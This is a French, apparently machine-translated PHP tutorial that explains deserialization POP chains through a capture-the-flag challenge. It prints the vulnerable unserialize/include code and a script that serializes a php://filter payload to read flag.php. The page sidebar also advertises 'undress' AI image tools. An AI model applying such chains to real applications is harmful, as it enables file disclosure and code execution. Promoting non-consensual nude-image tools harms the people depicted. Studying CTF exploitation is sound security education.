développement back-end
tutoriel php
Introduction détaillée aux points de connaissance de la construction de chaînes pop de désérialisation PHP
Introduction détaillée aux points de connaissance de la construction de chaînes pop de désérialisation PHP
Cet article vous apporte des connaissances pertinentes sur PHP, qui présente principalement des problèmes liés à la construction de chaînes pop. La chaîne pop est une sorte de programmation orientée attributs, qui est couramment utilisée pour construire des chaînes d'appels. J'espère que cela aidera tout le monde.
Apprentissage recommandé : "Tutoriel vidéo PHP"
Alors que nous continuons à en apprendre davantage sur la désérialisation, apprenons-en plus sur la structure de la chaîne pop. Cette chaîne pop est encore difficile à comprendre pour un novice comme moi. Je vais réécrire cet article pour la résumer et approfondir ma compréhension de la construction de chaînes pop. En même temps, cela permet également de comprendre les amis qui souhaitent rejoindre le piège.
Construction de chaîne pop
Problèmes généraux de désérialisation, là où il y a des failles ou où du code malveillant peut être injecté dans la méthode magique, nous pouvons obtenir l'effet d'attaque en appelant automatiquement la méthode magique. Mais lorsque le point d'injection existe dans une méthode de classe ordinaire, la méthode appelée automatiquement auparavant ne sera pas valide. Par conséquent, nous devons trouver le lien entre la classe ordinaire et la méthode magique, trouver une idée logique et utiliser cette idée logique pour. Construisez une chaîne pop pour atteindre le but de l'attaque. Par conséquent, lorsque nous répondons à ce genre de questions pop, nous devons prêter une attention particulière à la méthode magique.
Introduction à la chaîne pop
C'est une méthode de programmation orientée attributs qui est souvent utilisée pour construire des chaînes d'appels. Trouvez une série d'instructions qui peuvent être appelées dans le code de la question et intégrez ces instructions dans un code logique qui peut produire des effets d'attaque malveillants, qui est la chaîne pop (compréhension personnelle, les maîtres sont invités à donner leur avis) dans la construction du chaîne pop, les méthodes magiques sont essentielles. Ce qui suit utilisera un exemple pour expliquer comment la chaîne pop est construite, ainsi que les idées de construction spécifiques
Le code de la question :
Welcome to index.php
<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
protected $var;
public function append($value){
include($value);
}
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
public function __toString(){
return $this->str->source;
}
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
public function __construct(){
$this->p = array();
}
public function __get($key){
$function = $this->p;
return $function();
}
}
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
Idées de construction
Lors de la construction de la chaîne d'appel, trouvez d'abord la tête et la queue de l'appel. chaîne. L'en-tête est généralement un endroit où les paramètres peuvent être transmis et désérialisés, tandis que la queue est généralement un endroit où du code malveillant peut être exécuté. Lors de l'audit du code pour cette question, l'en-tête utilise la méthode get pour transmettre les paramètres à afficher, et la queue inclut la fonction include. À ce stade, nous devrions tous savoir que nous devons utiliser le pseudo-protocole PHP pour lire le code source du fichier flag. Maintenant que la tête et la queue sont trouvées, nous connaissons également la méthode d'attaque. Trouvez ensuite la méthode magique dans la question.
__invoke() 当一个类被当作函数执行时调用此方法。 __construct 在创建对象时调用此方法 __toString() 在一个类被当作字符串处理时调用此方法 __wakeup() 当反序列化恢复成对象时调用此方法 __get() 当读取不可访问或不存在的属性的值会被调用
Il y a un total de ces cinq méthodes magiques dans la question. Trouvez ensuite le lien entre les classes ordinaires et les méthodes magiques.
Il n'est pas difficile de voir qu'il existe une fonction preg_match dans la fonction wakeup, qui est utilisée pour trouver des chaînes sensibles dans la source. Nous pouvons commencer à partir d'ici et attribuer la source à une classe show, puis la fonction toString sera. automatiquement déclenché, nous devons donc maintenant utiliser la méthode tostring. Pour étendre la chaîne, nous pouvons attribuer $this->str à la classe de test dans la méthode totring et lire la variable source dans la classe de test (car il n'y en a pas. source dans la classe de test, un attribut inaccessible est accessible.) Ensuite, il appellera automatiquement la méthode get magic. On peut constater qu'il y a un appel de fonction dans la méthode get, alors nous pouvons attribuer $this->p à la classe Modifier, et la méthode d'invocation sera automatiquement appelée pour exécuter le pseudo-protocole PHP que nous avons écrit (attribuez le var dans la classe Modifer de notre code malveillant)
À ce stade, nous construisons la chaîne pop.
Explication de la chaîne pop
<?php
class Modifier {
protected $var='php://filter/read=convert.base64-encode/resource=flag.php';
}
class Show{
public $source;
public $str;
function _construct(){
$this->source=$file;
}
}
class Test{
public $p;
}
$a = new show();
$b = new show();
$c = new test();
$d = new Modifier();
$a->source=$b;
$b->str=$c;
$c->p= $d;
echo urlencode(serialize($a));
?>
Écrivez d'abord les classes utilisées pour former un cadre, puis indiquez les variables dans les classes. Instanciez les classes utilisées séparément. Pourquoi devez-vous utiliser new show deux fois ? (Vous devriez pouvoir comprendre en regardant le code. La première fois consiste à instancier la classe show, et la deuxième fois, à instancier la classe show après. la première fois. source=show instancié pour la deuxième fois)
Essayez d'utiliser le codage d'url lorsque nous sérialisons (il y a des attributs modifiés protégés dans cette question, et il y aura des caractères invisibles)
Apprentissage recommandé : "Tutoriel vidéo PHP 》
Ce qui précède est le contenu détaillé de. pour plus d'informations, suivez d'autres articles connexes sur le site Web de PHP en chinois!
Outils d'IA chauds
Undress AI Tool
Images de déshabillage gratuites
Undresser.AI Undress
Application basée sur l'IA pour créer des photos de nu réalistes
AI Clothes Remover
Outil d'IA en ligne pour supprimer les vêtements des photos.
Clothoff.io
Dissolvant de vêtements AI
Video Face Swap
Échangez les visages dans n'importe quelle vidéo sans effort grâce à notre outil d'échange de visage AI entièrement gratuit !
Article chaud
Outils chauds
Bloc-notes++7.3.1
Éditeur de code facile à utiliser et gratuit
SublimeText3 version chinoise
Version chinoise, très simple à utiliser
Envoyer Studio 13.0.1
Puissant environnement de développement intégré PHP
Dreamweaver CS6
Outils de développement Web visuel
SublimeText3 version Mac
Logiciel d'édition de code au niveau de Dieu (SublimeText3)
Sujets chauds
Un guide simple de la configuration PHP
Jul 18, 2025 am 04:25 AM
La clé pour configurer PHP est de clarifier la méthode d'installation, de configurer PHP.ini, de se connecter au serveur Web et d'activer les extensions nécessaires. 1. Installez PHP: utilisez APT pour Linux, Homebrew pour Mac et XAMPP recommandé pour Windows; 2. Configurer php.ini: ajuster les rapports d'erreur, télécharger des restrictions, etc. et redémarrer le serveur; 3. Utilisez le serveur Web: Apache utilise MOD_PHP, NGINX utilise PHP-FPM; 4. Installez les extensions couramment utilisées: comme MySQLI, JSON, MBSTRING, etc. pour prendre en charge les fonctions complètes.
Tutoriel d'installation rapide PHP
Jul 18, 2025 am 04:52 AM
Toinstallphpquickly, usexAmpPonWindowsorHomebrewonMacos.1.onwindows, downloadAndInstallxAmppp, selectComponents, startapache et placefilesInhtdocs.2.
Conseils pour écrire des commentaires PHP
Jul 18, 2025 am 04:51 AM
La clé pour rédiger des commentaires PHP est de clarifier l'objectif et les spécifications. Les commentaires devraient expliquer "pourquoi" plutôt que "ce qui a été fait", en évitant la redondance ou trop de simplicité. 1. Utilisez un format unifié, tel que DocBlock (/ * /) pour les descriptions de classe et de méthode afin d'améliorer la lisibilité et la compatibilité des outils; 2. Soulignez les raisons de la logique, telles que pourquoi les sauts JS doivent être sortis manuellement; 3. Ajoutez une description d'une vue d'ensemble avant le code complexe, décrivez le processus dans les étapes et aidez à comprendre l'idée globale; 4. Utilisez TODO et FIXME Rationalement pour marquer des éléments et des problèmes de tâches pour faciliter le suivi et la collaboration ultérieurs. De bonnes annotations peuvent réduire les coûts de communication et améliorer l'efficacité de la maintenance du code.
Apprendre PHP: un guide du débutant
Jul 18, 2025 am 04:54 AM
Toléarnphpeffective, startBySettingUpAlocalServerERironmentUsingToolsLILYXAMPPANDACODEDITERLIGHILLEVSCODE.1) INSTRUSITIONXAMPFORAPACHE, MYSQL, ANDPHP.2) USACODEDEDITORFORSYNTAXSUPPORT.3)
Commentant le code en php
Jul 18, 2025 am 04:57 AM
Il existe trois méthodes courantes pour le code de commentaire PHP: 1. Utiliser // ou # pour bloquer une ligne de code, et il est recommandé d'utiliser //; 2. Utiliser /.../ pour envelopper des blocs de code avec plusieurs lignes, qui ne peuvent pas être imbriquées mais peuvent être croisées; 3. Compétences combinées Commentaires tels que l'utilisation / if () {} / pour contrôler les blocs logiques, ou pour améliorer l'efficacité avec les touches de raccourci de l'éditeur, vous devez prêter attention aux symboles de fermeture et éviter les nidification lorsque vous les utilisez.
Rédaction de commentaires PHP efficaces
Jul 18, 2025 am 04:44 AM
Les commentaires ne peuvent pas être négligents car ils veulent expliquer les raisons de l'existence du code plutôt que des fonctions, telles que la compatibilité avec les anciennes interfaces ou les restrictions tierces, sinon les personnes qui lisent le code ne peuvent s'appuyer que sur de la devinettes. Les zones qui doivent être commentées comprennent des jugements conditionnels complexes, une logique spéciale de gestion des erreurs et des restrictions de dérivation temporaires. Une façon plus pratique d'écrire des commentaires consiste à sélectionner des commentaires en une seule ligne ou à bloquer les commentaires en fonction de la scène. Utilisez des commentaires sur le bloc de documents pour expliquer les paramètres et les valeurs de retour au début des fonctions, des classes et des fichiers, et gardez les commentaires à jour. Pour une logique complexe, vous pouvez ajouter une ligne à la précédente pour résumer l'intention globale. En même temps, n'utilisez pas de commentaires pour sceller le code, mais utilisez des outils de contrôle de version.
Master les commentaires du bloc PHP
Jul 18, 2025 am 04:35 AM
PhpBlockComments est en train de faire en sorte
Améliorer la lisibilité avec les commentaires
Jul 18, 2025 am 04:46 AM
La clé pour écrire de bons commentaires est d'expliquer "pourquoi" plutôt que "ce qui a été fait" pour améliorer la lisibilité du code. 1. Les commentaires devraient expliquer des raisons logiques, telles que les considérations derrière la sélection de la valeur ou le traitement; 2. Utilisez des annotations de paragraphe pour une logique complexe pour résumer l'idée globale des fonctions ou des algorithmes; 3. Maintenir régulièrement des commentaires pour garantir la cohérence avec le code, éviter les tromperies et supprimer le contenu obsolète si nécessaire; 4. Vérifiez de manière synchrone les commentaires lors de l'examen du code et enregistrez la logique publique via des documents pour réduire le fardeau des commentaires du code.
